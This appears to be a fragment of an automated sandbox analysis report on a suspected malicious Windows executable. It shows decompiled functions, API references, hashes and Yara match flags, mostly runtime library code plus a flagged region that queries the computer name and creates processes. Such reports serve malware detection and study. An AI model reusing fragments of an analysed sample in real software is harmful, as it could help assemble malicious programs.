                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                              • String ID:
                                                                              • API String ID: 2596413745-3916222277
                                                                              • Opcode ID: d7c9fb92b5efe179fd426076629671e5cd4ece26ba5f69d4e276d5057d3b9958
                                                                              • Instruction ID: 466963c9648dca894fd8a1441b2f17f1d41f046d24833c68511cb02646e1ea80
                                                                              • Opcode Fuzzy Hash: d7c9fb92b5efe179fd426076629671e5cd4ece26ba5f69d4e276d5057d3b9958
                                                                              • Instruction Fuzzy Hash: A2210771E002199FEB20CFA8EDC9AAE7BB5EB84301F040576E905EB291E7749544CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222DDD6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 0222DDEC
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 0222DE19
                                                                              • _snprintf.NTDLL ref: 0222DE87
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharComputerMultiNameWide_snprintf
                                                                              • String ID: X
                                                                              • API String ID: 4080658169-3081909835
                                                                              • Opcode ID: 505ab3a83837a009206b75ece33c03dd107466c000b67365b73a66eeed5fc6e2
                                                                              • Instruction ID: 02ee5759e57517b2091d7ee09696148d8fcc4c6183c729ac6eda9064cf1d9671
                                                                              • Opcode Fuzzy Hash: 505ab3a83837a009206b75ece33c03dd107466c000b67365b73a66eeed5fc6e2
                                                                              • Instruction Fuzzy Hash: 2A11DD7196026D7BDB20DAE49C04BEF37AE9F15704F1000C5E805F2189E7224A0EC7A6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00417735, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 95%
                                                                              			E00417735() {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				signed int _t16;
				signed int _t22;
				CHAR* _t25;
				signed int _t34;
				intOrPtr _t45;

				_push(_t27);
				_t45 =  *0x45be8c; // 0x1
				if(_t45 == 0) {
					E00413A27();
				}
				 *0x45a71c = 0;
				GetModuleFileNameA(0, 0x45a618, 0x104);
				_t10 =  *0x45be90; // 0x5a3320
				 *0x45a420 = 0x45a618;
				if(_t10 == 0) {
					L4:
					_t25 = 0x45a618;
				} else {
					_t25 = _t10;
					if( *_t10 == 0) {
						goto L4;
					}
				}
				E004175C9(_t25, 0,  &_v12, 0,  &_v8);
				_t40 = _v8 << 2;
				_t16 = E00412247(_v12 + (_v8 << 2));
				_t34 = _t16;
				if(_t34 != 0) {
					E004175C9(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
					 *0x45a404 = _v8 - 1;
					 *0x45a408 = _t34;
					_t22 = 0;
				} else {
					_t22 = _t16 | 0xffffffff;
				}
				return _t22;
			}













                                                                              0x00417739
                                                                              0x0041773f
                                                                              0x00417745
                                                                              0x00417747
                                                                              0x00417747
                                                                              0x00417758
                                                                              0x0041775f
                                                                              0x00417765
                                                                              0x0041776c
                                                                              0x00417772
                                                                              0x0041777b
                                                                              0x0041777b
                                                                              0x00417774
                                                                              0x00417777
                                                                              0x00417779
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417779
                                                                              0x00417789
                                                                              0x00417794
                                                                              0x0041779a
                                                                              0x0041779f
                                                                              0x004177a6
                                                                              0x004177ba
                                                                              0x004177c4
                                                                              0x004177ca
                                                                              0x004177d0
                                                                              0x004177a8
                                                                              0x004177a8
                                                                              0x004177a8
                                                                              0x004177d6

                                                                              APIs
                                                                              • ___initmbctable.LIBCMT ref: 00417747
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\lK8vF3n2e7.exe,00000104,74B04DE0,00000000,?,?,?,?,00412E7D,?,0044BC68,00000060), ref: 0041775F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleName___initmbctable
                                                                              • String ID: 3Z$C:\Users\user\Desktop\lK8vF3n2e7.exe
                                                                              • API String ID: 767393020-3683122234
                                                                              • Opcode ID: 4aa6bfedd45c87f98334d07c1f7acca7055357ef1ded89f83587537b5a094804
                                                                              • Instruction ID: 457d7393be54ac7cc5c3ea1c43a3c6052e7685e44cc6ff2440ebf8175e7fa41b
                                                                              • Opcode Fuzzy Hash: 4aa6bfedd45c87f98334d07c1f7acca7055357ef1ded89f83587537b5a094804
                                                                              • Instruction Fuzzy Hash: 3811E772A08204ABD711CBD5EC459DB7BF8EB45365F10016BF915D3252D6B4EE80CB98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004202BA, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 57%
                                                                              			E004202BA(void* __ecx) {
				signed int _t27;
				void* _t31;
				signed char _t37;
				signed char _t40;
				void* _t47;

				E004128A0(E00431557, _t47);
				_t27 =  *(_t47 + 8) & 0x00000017;
				 *(__ecx + 8) = _t27;
				_t40 =  *(__ecx + 0xc) & _t27;
				if(_t40 != 0) {
					if( *((intOrPtr*)(_t47 + 0xc)) == 0) {
						__eflags = _t40 & 0x00000004;
						if(__eflags == 0) {
							_t37 = 2;
							__eflags = _t37 & _t40;
							if(__eflags == 0) {
								E00420298(_t47 - 0x94, __eflags, "ios_base::eofbit set");
								_push(_t47 - 0x94);
								 *((intOrPtr*)(_t47 - 4)) = 0;
								E00420235(_t47 - 0x78, __eflags);
								 *((intOrPtr*)(_t47 - 0x78)) = 0x44e5d0;
								_push(0x4532dc);
								_t31 = _t47 - 0x78;
							} else {
								E00420298(_t47 - 0x50, __eflags, "ios_base::failbit set");
								 *((intOrPtr*)(_t47 - 4)) = 1;
								goto L5;
							}
						} else {
							E00420298(_t47 - 0x50, __eflags, "ios_base::badbit set");
							 *((intOrPtr*)(_t47 - 4)) = 0;
							L5:
							_push(_t47 - 0x50);
							E00420235(_t47 - 0x34, __eflags);
							 *((intOrPtr*)(_t47 - 0x34)) = 0x44e5d0;
							_push(0x4532dc);
							_t31 = _t47 - 0x34;
						}
						_push(_t31);
					} else {
						_push(0);
						_push(0);
					}
					_t27 = E004128BF();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t27;
			}








                                                                              0x004202bf
                                                                              0x004202cd
                                                                              0x004202d0
                                                                              0x004202d6
                                                                              0x004202d8
                                                                              0x004202e3
                                                                              0x004202ec
                                                                              0x004202ef
                                                                              0x00420320
                                                                              0x00420321
                                                                              0x00420323
                                                                              0x00420346
                                                                              0x00420351
                                                                              0x00420355
                                                                              0x00420358
                                                                              0x0042035d
                                                                              0x00420364
                                                                              0x00420369
                                                                              0x00420325
                                                                              0x0042032d
                                                                              0x00420332
                                                                              0x00000000
                                                                              0x00420332
                                                                              0x004202f1
                                                                              0x004202f9
                                                                              0x004202fe
                                                                              0x00420301
                                                                              0x00420304
                                                                              0x00420308
                                                                              0x0042030d
                                                                              0x00420314
                                                                              0x00420319
                                                                              0x00420319
                                                                              0x0042036c
                                                                              0x004202e5
                                                                              0x004202e5
                                                                              0x004202e6
                                                                              0x004202e6
                                                                              0x0042036d
                                                                              0x0042036d
                                                                              0x00420375
                                                                              0x0042037d

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                              • API String ID: 3519838083-1866435925
                                                                              • Opcode ID: 79ebf55eb55cb205d2495990de9d74f1dfb77c99cfbfb72c0f0e6fde5a8e46bf
                                                                              • Instruction ID: a01fc7ce836ce9bef13a97eee2cabd1fa3b6f243fbc551c372b3e635789312fc
                                                                              • Opcode Fuzzy Hash: 79ebf55eb55cb205d2495990de9d74f1dfb77c99cfbfb72c0f0e6fde5a8e46bf
                                                                              • Instruction Fuzzy Hash: 21115771A00128EBD700DFD1E995BDDB7B47B00308FA4845FA50667543DB795E45CB1C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00420BA9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E00420BA9(void* __ebx, void* __eflags) {
				void* __edi;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t44;

				_t28 = __ebx;
				E004128A0(E004315B3, _t44);
				E00421916(_t44 - 0x14, 0);
				_t42 =  *0x45a90c; // 0x2270b48
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t42;
				_t39 = E004219C6( *((intOrPtr*)(_t44 + 8)), E00420663(0x45aa30));
				if(_t39 == 0) {
					if(_t42 == 0) {
						_push(_t44 - 0x10);
						if(E004208A1(__ebx) == 0xffffffff) {
							E004225BC(_t44 - 0x20, "bad cast");
							E004128BF(_t44 - 0x20, 0x4534d8);
						}
						_t39 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x45a90c = _t39;
						E0042005A(_t39);
						E00421A3E(_t28, _t39, _t39);
					} else {
						_t39 = _t42;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E00421939(_t44 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return _t39;
			}







                                                                              0x00420ba9
                                                                              0x00420bae
                                                                              0x00420bbd
                                                                              0x00420bc2
                                                                              0x00420bc8
                                                                              0x00420bd1
                                                                              0x00420be2
                                                                              0x00420be6
                                                                              0x00420bea
                                                                              0x00420bf3
                                                                              0x00420bfd
                                                                              0x00420c07
                                                                              0x00420c15
                                                                              0x00420c15
                                                                              0x00420c1a
                                                                              0x00420c1f
                                                                              0x00420c25
                                                                              0x00420c2c
                                                                              0x00420bec
                                                                              0x00420bec
                                                                              0x00420bec
                                                                              0x00420bea
                                                                              0x00420c31
                                                                              0x00420c38
                                                                              0x00420c44
                                                                              0x00420c4c

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prologIncrefstd::locale::facet::_
                                                                              • String ID: bad cast
                                                                              • API String ID: 931760182-3145022300
                                                                              • Opcode ID: 6239ec138047089c61464696ff57aa4ca2c9a5dcaa3553e8e0aa90186cb2331b
                                                                              • Instruction ID: 7646712c7103c562e122446d79630f377676aed2ed7ba1a7b97c37107fb7ea14
                                                                              • Opcode Fuzzy Hash: 6239ec138047089c61464696ff57aa4ca2c9a5dcaa3553e8e0aa90186cb2331b
                                                                              • Instruction Fuzzy Hash: 5A1106B1B001349BCB04FB56E9127AEB374AF90315F90461FF411A72D2CB7C9A01C799
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00420FE5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 90%
                                                                              			E00420FE5(void* __ebx, void* __edi, void* __eflags) {
				intOrPtr _t18;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t44;
				void* _t46;

				_t40 = __edi;
				_t30 = __ebx;
				E004128A0(E004315B3, _t46);
				E00421916(_t46 - 0x14, 0);
				_t18 =  *0x45a914; // 0x0
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				 *((intOrPtr*)(_t46 - 0x10)) = _t18;
				_t44 = E004219C6( *((intOrPtr*)(_t46 + 8)), E00420663(0x45a9b0));
				if(_t44 == 0) {
					_t44 =  *((intOrPtr*)(_t46 - 0x10));
					if(_t44 == 0) {
						_push(_t46 - 0x10);
						if(E00421089(__ebx) == 0xffffffff) {
							E004225BC(_t46 - 0x20, "bad cast");
							E004128BF(_t46 - 0x20, 0x4534d8);
						}
						_t37 =  *((intOrPtr*)(_t46 - 0x10));
						_push(_t40);
						_t44 = _t37;
						 *0x45a914 = _t37;
						E0042005A(_t37);
						E00421A3E(_t30, _t37, _t37);
					}
				}
				 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
				E00421939(_t46 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
				return _t44;
			}








                                                                              0x00420fe5
                                                                              0x00420fe5
                                                                              0x00420fea
                                                                              0x00420ff8
                                                                              0x00420ffd
                                                                              0x00421002
                                                                              0x0042100b
                                                                              0x0042101c
                                                                              0x00421020
                                                                              0x00421022
                                                                              0x00421027
                                                                              0x0042102c
                                                                              0x00421036
                                                                              0x00421040
                                                                              0x0042104e
                                                                              0x0042104e
                                                                              0x00421053
                                                                              0x00421056
                                                                              0x00421057
                                                                              0x00421059
                                                                              0x00421061
                                                                              0x00421068
                                                                              0x0042106d
                                                                              0x00421027
                                                                              0x0042106e
                                                                              0x00421075
                                                                              0x00421080
                                                                              0x00421088

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00420FEA
                                                                              • int.LIBCPMT ref: 0042100E
                                                                                • Part of subcall function 00421089: __EH_prolog.LIBCMT ref: 0042108E
                                                                              • std::locale::facet::_Incref.LIBCPMT ref: 00421061
                                                                                • Part of subcall function 004128BF: RaiseException.KERNEL32(?,?,?,?,0045A0D8,00000000), ref: 004128ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$ExceptionIncrefRaisestd::locale::facet::_
                                                                              • String ID: bad cast
                                                                              • API String ID: 854657108-3145022300
                                                                              • Opcode ID: 31631b0ea149f4234278b6ee19938042c7a2eb6258395781997413644070bb3b
                                                                              • Instruction ID: 665209f4067d6d268fc5e6a63874f43f06b626683c65bfbba0b9105d0ed3fcea
                                                                              • Opcode Fuzzy Hash: 31631b0ea149f4234278b6ee19938042c7a2eb6258395781997413644070bb3b
                                                                              • Instruction Fuzzy Hash: F911C1B1F00234ABCB14EBA5E912AAE7364AB54314F91461FF411A72E2CB7C8A408798
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02221CC2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02221CF2
                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02221D12
                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02221D1B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$CreateProcess
                                                                              • String ID: D
                                                                              • API String ID: 2922976086-2746444292
                                                                              • Opcode ID: 9684e5139708f04cba162536bbc62bead3b660fbaea0c8736c77695f3aa35536
                                                                              • Instruction ID: ae5fc6090ad628f91a345fd7fab50a951a6ffcb4f696580122e68115a46346aa
                                                                              • Opcode Fuzzy Hash: 9684e5139708f04cba162536bbc62bead3b660fbaea0c8736c77695f3aa35536
                                                                              • Instruction Fuzzy Hash: 49F0C872920118BBDB01DEE5DC08DFF77BDEF45711B104425F91EE6104EBB19929C6A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C629, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E0042C629(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v276;
				intOrPtr _t10;
				long _t12;
				void* _t13;
				CHAR* _t16;
				void* _t30;
				void* _t33;

				_t10 =  *0x457184; // 0xc72e1596
				_v8 = _t10;
				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
				if(_t12 == 0 || _t12 == 0x104) {
					L4:
					_t13 = 0;
				} else {
					_push(__esi);
					_push(__edi);
					_t16 = PathFindExtensionA( &_v276);
					asm("movsd");
					asm("movsw");
					asm("movsb");
					_pop(_t30);
					_pop(_t33);
					if(_t16 -  &_v276 + 7 > 0x104) {
						goto L4;
					} else {
						lstrcpyA(_t16,  &_v16);
						_t13 = E0042C343(0x104, _t30, _t33,  &_v276);
					}
				}
				return E00412FBB(_t13, _v8);
			}












                                                                              0x0042c632
                                                                              0x0042c638
                                                                              0x0042c64b
                                                                              0x0042c653
                                                                              0x0042c6a0
                                                                              0x0042c6a0
                                                                              0x0042c659
                                                                              0x0042c659
                                                                              0x0042c65a
                                                                              0x0042c662
                                                                              0x0042c670
                                                                              0x0042c671
                                                                              0x0042c67d
                                                                              0x0042c683
                                                                              0x0042c684
                                                                              0x0042c685
                                                                              0x00000000
                                                                              0x0042c687
                                                                              0x0042c68c
                                                                              0x0042c699
                                                                              0x0042c699
                                                                              0x0042c685
                                                                              0x0042c6ac

                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042C64B
                                                                              • PathFindExtensionA.SHLWAPI(?), ref: 0042C662
                                                                              • lstrcpyA.KERNEL32(00000000,?), ref: 0042C68C
                                                                                • Part of subcall function 0042C343: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042C366
                                                                                • Part of subcall function 0042C343: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0042C371
                                                                                • Part of subcall function 0042C343: ConvertDefaultLocale.KERNEL32(?), ref: 0042C3A2
                                                                                • Part of subcall function 0042C343: ConvertDefaultLocale.KERNEL32(?), ref: 0042C3AA
                                                                                • Part of subcall function 0042C343: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042C3B7
                                                                                • Part of subcall function 0042C343: ConvertDefaultLocale.KERNEL32(?), ref: 0042C3D1
                                                                                • Part of subcall function 0042C343: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042C3D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                              • String ID: %s.dll
                                                                              • API String ID: 4178508759-3668843792
                                                                              • Opcode ID: 0d83078e46f4f7abbcd87e5b3769130cdcc8ec084be9341a9bf6b0554823ebfa
                                                                              • Instruction ID: 93014bb54645c6d4f552ad3928b98ba6e491190312b9504a5209be15561fadef
                                                                              • Opcode Fuzzy Hash: 0d83078e46f4f7abbcd87e5b3769130cdcc8ec084be9341a9bf6b0554823ebfa
                                                                              • Instruction Fuzzy Hash: EE018871A00118ABCF15DFB4ED859EFB7BCEB48300F4404BAA606D3141D6B49A458B54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041AD20, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 62%
                                                                              			E0041AD20(void* __eflags) {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_push(0x10);
				_push(0x44cc68);
				E00412BA4(_t13, _t14, _t15);
				_t9 =  *0x45a830;
				if(_t9 == 0) {
					if( *0x45a3f0 == 1) {
						L4:
						_t9 = E0041AD10;
						 *0x45a830 = E0041AD10;
					} else {
						_t12 = GetModuleHandleA("kernel32.dll");
						if(_t12 == 0) {
							goto L4;
						} else {
							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
							 *0x45a830 = _t9;
							if(_t9 == 0) {
								goto L4;
							}
						}
					}
				}
				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
				return E00412BDF(_t10);
			}









                                                                              0x0041ad20
                                                                              0x0041ad22
                                                                              0x0041ad27
                                                                              0x0041ad2c
                                                                              0x0041ad33
                                                                              0x0041ad3c
                                                                              0x0041ad62
                                                                              0x0041ad62
                                                                              0x0041ad67
                                                                              0x0041ad3e
                                                                              0x0041ad43
                                                                              0x0041ad4b
                                                                              0x00000000
                                                                              0x0041ad4d
                                                                              0x0041ad53
                                                                              0x0041ad59
                                                                              0x0041ad60
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ad60
                                                                              0x0041ad4b
                                                                              0x0041ad3c
                                                                              0x0041ad6c
                                                                              0x0041ad78
                                                                              0x0041ada1
                                                                              0x0041adaa

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,0044CC68,00000010,004147D0,00000000,00000FA0,74B04DE0,00000000,00416411,00412E3E,?,0044BC68,00000060), ref: 0041AD43
                                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 0041AD53
                                                                              Strings
                                                                              • kernel32.dll, xrefs: 0041AD3E
                                                                              • InitializeCriticalSectionAndSpinCount, xrefs: 0041AD4D
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                              • API String ID: 1646373207-3733552308
                                                                              • Opcode ID: 5b2b6ff3261692e85f50454db1c6354fcf8f14c476355ffba9d11ac6989c9739
                                                                              • Instruction ID: 863186edba7a30bb6a15ea8557114f505acaba35b9ff552a889fbd431f584582
                                                                              • Opcode Fuzzy Hash: 5b2b6ff3261692e85f50454db1c6354fcf8f14c476355ffba9d11ac6989c9739
                                                                              • Instruction Fuzzy Hash: ABF05430A41705ABDF20AF64AD497DA37B1BB40716B144227E818D26A1D77CC9B1D71F
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A306, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E0041A306() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				signed char _t9;

				_t9 = GetModuleHandleA("KERNEL32");
				if(_t9 == 0) {
					L6:
					_v12 =  *0x44cba8;
					_v20 =  *0x44cba0;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
					asm("fcomp qword [0x44cb98]");
					asm("fnstsw ax");
					if((_t9 & 0x00000041) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                              0x0041a30b
                                                                              0x0041a313
                                                                              0x0041a32a
                                                                              0x0041a2d2
                                                                              0x0041a2db
                                                                              0x0041a2e7
                                                                              0x0041a2ea
                                                                              0x0041a2f0
                                                                              0x0041a2f6
                                                                              0x0041a2fb
                                                                              0x0041a305
                                                                              0x0041a2fd
                                                                              0x0041a301
                                                                              0x0041a301
                                                                              0x0041a315
                                                                              0x0041a31b
                                                                              0x0041a323
                                                                              0x00000000
                                                                              0x0041a325
                                                                              0x0041a325
                                                                              0x0041a329
                                                                              0x0041a329
                                                                              0x0041a323

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,00414048), ref: 0041A30B
                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0041A31B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                              • API String ID: 1646373207-3105848591
                                                                              • Opcode ID: 673601ef4af6a368d6f370bbffffa8d98a2589559b18c2793c46341561166bb2
                                                                              • Instruction ID: b0d684946a038633be7e300e1b9a9ffa78109251a747c1e9c719707c1f5255e3
                                                                              • Opcode Fuzzy Hash: 673601ef4af6a368d6f370bbffffa8d98a2589559b18c2793c46341561166bb2
                                                                              • Instruction Fuzzy Hash: B4C0127074A60452FD101B712D1AB562214EB44B42F5410536816D05A4EA98D251902F
                                                                              Uniqueness

